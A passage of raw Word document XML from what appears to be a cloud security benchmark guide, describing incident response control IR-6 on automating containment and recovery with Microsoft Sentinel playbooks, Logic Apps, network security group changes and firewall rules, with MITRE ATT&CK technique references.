    <w:p w14:paraId="79751D9B" w14:textId="0F1E519D" w:rsidR="00616CDA" w:rsidRDefault="00616CDA" w:rsidP="007F2639">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00616CDA">
        <w:t>Legal Team Integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364A9FD2" w14:textId="7AF7E78E" w:rsidR="00616CDA" w:rsidRDefault="00616CDA" w:rsidP="007F2639">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="427"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00616CDA">
        <w:t>Automatic legal team notification for incidents involving data breaches, intellectual property, or regulatory compliance issues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1CF074" w14:textId="299643B9" w:rsidR="005A1034" w:rsidRDefault="005A1034" w:rsidP="005A1034">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="78" w:name="_Toc242449541"/>
      <w:r w:rsidRPr="005A1034">
        <w:t>Contain, recover, and learn from incidents</w:t>
      </w:r>
      <w:bookmarkEnd w:id="78"/>
    </w:p>
    <w:p w14:paraId="5C6C65D8" w14:textId="0726F3C4" w:rsidR="00E81CA9" w:rsidRDefault="00E81CA9" w:rsidP="00E81CA9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="79" w:name="_Toc242449542"/>
      <w:r w:rsidRPr="00E81CA9">
        <w:t>IR-6: Containment, eradication and recovery - automate the incident handling</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79"/>
    </w:p>
    <w:p w14:paraId="62EF2734" w14:textId="5D16E6C5" w:rsidR="00E81CA9" w:rsidRDefault="00E81CA9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="233"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E81CA9">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F12818B" w14:textId="1EEB393B" w:rsidR="00E81CA9" w:rsidRDefault="00E81CA9" w:rsidP="007F2639">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E81CA9">
        <w:t>Implement comprehensive incident response automation through Microsoft Sentinel playbooks, Logic Apps, and Power Automate to enable rapid containment, consistent response procedures, and scalable incident handling that matches the speed of automated attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA22408" w14:textId="16E88246" w:rsidR="00E81CA9" w:rsidRDefault="00E81CA9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="233"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E81CA9">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E81CA9">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0586607E" w14:textId="2E399D0C" w:rsidR="00E81CA9" w:rsidRDefault="00E81CA9" w:rsidP="007F2639">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E81CA9">
        <w:t>Extended response times</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A04FAB" w14:textId="5DD60D51" w:rsidR="00E81CA9" w:rsidRDefault="00E81CA9" w:rsidP="007F2639">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="234"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E81CA9">
        <w:t>Manual containment takes hours or days while automated attacks complete objectives in minutes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DA83ED" w14:textId="40D8ECFF" w:rsidR="00E81CA9" w:rsidRDefault="00E81CA9" w:rsidP="007F2639">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E81CA9">
        <w:t>Human error under pressure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36346F02" w14:textId="0B02001E" w:rsidR="00E81CA9" w:rsidRDefault="00E81CA9" w:rsidP="007F2639">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="234"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E81CA9">
        <w:t>Manual procedures produce mistakes including incomplete containment, evidence destruction, and incorrect recovery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEDD7D3" w14:textId="421FEB7A" w:rsidR="00E81CA9" w:rsidRDefault="00E81CA9" w:rsidP="007F2639">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E81CA9">
        <w:t>Inconsistent response across incidents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66614387" w14:textId="726A4C90" w:rsidR="00E81CA9" w:rsidRDefault="00E81CA9" w:rsidP="007F2639">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="234"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E81CA9">
        <w:t>Manual processes lead to variations in response quality, missed steps, and incomplete remediation depending on analyst experience and availability during incidents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1937AC5D" w14:textId="52363094" w:rsidR="00E81CA9" w:rsidRDefault="00E81CA9" w:rsidP="007F2639">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E81CA9">
        <w:t>Analyst burnout and resource exhaustion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A056E6A" w14:textId="0F0ED9DC" w:rsidR="00E81CA9" w:rsidRDefault="00E81CA9" w:rsidP="007F2639">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="234"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E81CA9">
        <w:t>Repetitive manual tasks during incident response consume analyst time and energy, reducing capacity for complex investigation and strategic threat hunting activities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CA5C89" w14:textId="0B9F9069" w:rsidR="00E81CA9" w:rsidRDefault="00E81CA9" w:rsidP="007F2639">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E81CA9">
        <w:t>Scalability limitations during widespread incidents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09ADB265" w14:textId="4AF70A94" w:rsidR="00E81CA9" w:rsidRDefault="00E81CA9" w:rsidP="007F2639">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="234"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E81CA9">
        <w:lastRenderedPageBreak/>
        <w:t>Organizations cannot respond effectively to multiple simultaneous incidents or large-scale attacks when relying on manual procedures requiring individual analyst attention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBEEB4A" w14:textId="119ED5C9" w:rsidR="00E81CA9" w:rsidRDefault="00E81CA9" w:rsidP="007F2639">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E81CA9">
        <w:t>Delayed containment allowing damage amplification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B98D5A" w14:textId="25F06F3B" w:rsidR="00E81CA9" w:rsidRDefault="00E81CA9" w:rsidP="007F2639">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="234"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E81CA9">
        <w:t>Manual isolation procedures take too long to prevent lateral movement, data exfiltration, and system compromise in fast-moving attacks like ransomware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE541C1" w14:textId="62B7C327" w:rsidR="00E81CA9" w:rsidRDefault="00E81CA9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="233"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E81CA9">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647F80FF" w14:textId="0AA57A53" w:rsidR="00E81CA9" w:rsidRDefault="00E81CA9" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E81CA9">
        <w:t>Lateral Movement (TA0008)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D6E322" w14:textId="61E3B2FB" w:rsidR="00C17637" w:rsidRDefault="00C17637" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="428"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00C17637">
        <w:t xml:space="preserve">exploitation of remote services (T1210) progressing rapidly through networks while manual containment procedures </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C17637">
        <w:t>lag behind</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C17637">
        <w:t xml:space="preserve"> attack progression.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717D3E63" w14:textId="580E5E24" w:rsidR="00E81CA9" w:rsidRDefault="00E81CA9" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E81CA9">
        <w:t>Impact (TA0040)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C85C45E" w14:textId="44E3025A" w:rsidR="00C17637" w:rsidRDefault="00C17637" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="428"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00C17637">
        <w:t>data encrypted for impact (T1486) deploying ransomware across multiple systems while manual isolation efforts cannot scale to match attack speed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3197B215" w14:textId="1C7B9BA6" w:rsidR="00E81CA9" w:rsidRDefault="00E81CA9" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E81CA9">
        <w:t>Exfiltration (TA0010)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25296608" w14:textId="2E000654" w:rsidR="00D914B0" w:rsidRDefault="00D914B0" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="428"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D914B0">
        <w:t>automated exfiltration (T1020) completing data theft operations during extended manual response times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00657103" w14:textId="0563CF4B" w:rsidR="00E81CA9" w:rsidRDefault="00E81CA9" w:rsidP="00E81CA9">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E81CA9">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>IR-6.1: Deploy Microsoft Sentinel automated response playbooks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3CE9C1" w14:textId="77777777" w:rsidR="00C704FB" w:rsidRDefault="00C704FB" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>Execute consistent rapid response through automation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318BC89D" w14:textId="688A60BF" w:rsidR="00C704FB" w:rsidRPr="00C704FB" w:rsidRDefault="00C704FB" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="428"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement Microsoft Sentinel Playbooks with Azure Logic Apps integration to automate common incident response actions including containment, investigation, and recovery. Playbooks provide consistent, rapid </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>response</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>at</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> scale.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0AA024" w14:textId="65C9E24A" w:rsidR="00E81CA9" w:rsidRDefault="00E81CA9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="235"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E81CA9">
        <w:t>Core playbook categories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19358615" w14:textId="140E0CFE" w:rsidR="00E81CA9" w:rsidRDefault="00E81CA9" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E81CA9">
        <w:t>User account response playbooks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168FA483" w14:textId="24CB721C" w:rsidR="00E81CA9" w:rsidRPr="00E81CA9" w:rsidRDefault="00E81CA9" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="234"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E81CA9">
        <w:t>Automated user account disabling, password reset, session termination, and privilege revocation with approval workflows for false positive prevention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB135BD" w14:textId="60E25F76" w:rsidR="00E41A4A" w:rsidRDefault="00E81CA9" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E81CA9">
        <w:t>Device Isolation Playbooks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D8EA39" w14:textId="15DA975F" w:rsidR="00E81CA9" w:rsidRDefault="00E81CA9" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="234"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E81CA9">
        <w:t>Automated VM isolation through Network Security Group modification, Azure Firewall rule deployment, and virtual network segmentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12952395" w14:textId="31D8F313" w:rsidR="00E81CA9" w:rsidRDefault="00E81CA9" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E81CA9">
        <w:t>Malware Response Playbooks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5A4774" w14:textId="081B6B87" w:rsidR="00E81CA9" w:rsidRDefault="00E81CA9" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="234"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E81CA9">
        <w:t>Automated file quarantine, hash blocking across Azure Defender, and signature deployment to Windows Defender across the organization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046FCC5D" w14:textId="328287FC" w:rsidR="00E81CA9" w:rsidRDefault="00E81CA9" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E81CA9">
        <w:t>Data Protection Playbooks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB446F9" w14:textId="0F1ABC14" w:rsidR="00E81CA9" w:rsidRDefault="00E81CA9" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="234"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E81CA9">
        <w:t>Automated data classification review, access revocation, and encryption key rotation for incidents involving data exposure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE4A365" w14:textId="30C698E2" w:rsidR="00E81CA9" w:rsidRDefault="00E81CA9" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E81CA9">
        <w:t>Communication and notification playbooks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3942A736" w14:textId="1E9D07EE" w:rsidR="00E81CA9" w:rsidRDefault="00E81CA9" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="234"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E81CA9">
        <w:lastRenderedPageBreak/>
        <w:t>Automated stakeholder notification, customer communication, and regulatory reporting with templated messaging and approval workflows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C47C29" w14:textId="32225CA2" w:rsidR="00E81CA9" w:rsidRDefault="00E81CA9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="235"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E81CA9">
        <w:t>Integration capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C5CE69" w14:textId="6FCC5FE2" w:rsidR="00E81CA9" w:rsidRDefault="00E81CA9" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E81CA9">
        <w:t>Microsoft Entra ID integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7603D4AD" w14:textId="65B94E20" w:rsidR="00E81CA9" w:rsidRDefault="00E81CA9" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="236"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E81CA9">
        <w:t>Automated user account management, conditional access policy modification, and privileged identity management actions through Microsoft Graph API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC342C2" w14:textId="7953C84C" w:rsidR="00E81CA9" w:rsidRDefault="00E81CA9" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E81CA9">
        <w:t>Microsoft Defender Integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638F45E5" w14:textId="4F4C687F" w:rsidR="00E81CA9" w:rsidRDefault="00E81CA9" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="236"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E81CA9">
        <w:t>Automated threat hunting, indicator of compromise (IoC) blocking, and security recommendation implementation across Defender platforms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D2B7E4" w14:textId="40D11B70" w:rsidR="00E81CA9" w:rsidRDefault="00E81CA9" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E81CA9">
        <w:t>Azure Resource Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BA6672" w14:textId="01BA8E48" w:rsidR="00E81CA9" w:rsidRDefault="00E81CA9" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="236"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E81CA9">
        <w:t>Automated resource isolation, configuration changes, and backup triggering through Azure Resource Manager APIs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774EA23D" w14:textId="14F49D6B" w:rsidR="00E81CA9" w:rsidRDefault="00E81CA9" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E81CA9">
        <w:t>Third-Party SOAR Integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B616B59" w14:textId="79F8522A" w:rsidR="00E81CA9" w:rsidRDefault="00E81CA9" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="236"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E81CA9">
        <w:t>Integration with ServiceNow, Phantom, and other Security Orchestration, Automation, and Response platforms through REST APIs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141E691E" w14:textId="7675BEBD" w:rsidR="00E81CA9" w:rsidRDefault="00E81CA9" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E81CA9">
        <w:t>Approval and Human Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7CBA65" w14:textId="6A14F215" w:rsidR="00E81CA9" w:rsidRDefault="00E81CA9" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="236"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E81CA9">
        <w:t>Configurable approval workflows for high-impact automated actions with timeout procedures and escalation mechanisms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75367E45" w14:textId="4B82DDE3" w:rsidR="00E41A4A" w:rsidRDefault="00E81CA9" w:rsidP="00E81CA9">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E81CA9">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>IR-6.2: Implement automated containment and isolation procedures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCE13AB" w14:textId="4B0ED921" w:rsidR="00203527" w:rsidRDefault="00203527">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="237"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00203527">
        <w:t>Network isolation automation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE7DF18" w14:textId="791CFA42" w:rsidR="00203527" w:rsidRDefault="00203527" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00203527">
        <w:t>Azure Network Security Group automation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577857F2" w14:textId="08FC3A29" w:rsidR="00203527" w:rsidRDefault="00203527" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="238"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00203527">
        <w:t>Automated modification of Network Security Group rules to isolate compromised virtual machines while preserving investigation access (Manage NSGs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D08552" w14:textId="4917641B" w:rsidR="00203527" w:rsidRDefault="00203527" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00203527">
        <w:t>Azure Firewall Rule Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FF29E1" w14:textId="57CCBC61" w:rsidR="00203527" w:rsidRDefault="00203527" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="238"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00203527">
        <w:t>Rapid deployment of Azure Firewall rules blocking malicious IP addresses, domains, and communication patterns identified during incidents using Azure Firewall.</w:t>
      </w:r>
    </w:p>
